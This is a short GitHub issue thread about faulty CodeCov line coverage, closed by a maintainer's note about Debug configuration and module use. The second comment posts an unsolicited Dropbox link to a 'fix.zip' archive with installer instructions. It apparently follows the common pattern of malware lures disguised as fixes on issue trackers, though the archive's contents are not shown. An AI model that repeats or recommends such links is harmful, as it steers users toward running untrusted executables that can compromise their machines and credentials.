### ISSUE TITLE
Issue with CodeCov 

### ISSUE THREAD

**Issue by Beleifte** [Caca-XP/Realm-of-Feasts#11]
Faulty coverage of lines

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NadiaPrasetyo** [comment]
Corrected module use: must use Debug

**Comment by NadiaPrasetyo** [comment]
Fixed this issue with the rerouting of the files and use of Debug configuration for both projects AND the module use for CodeCov generation
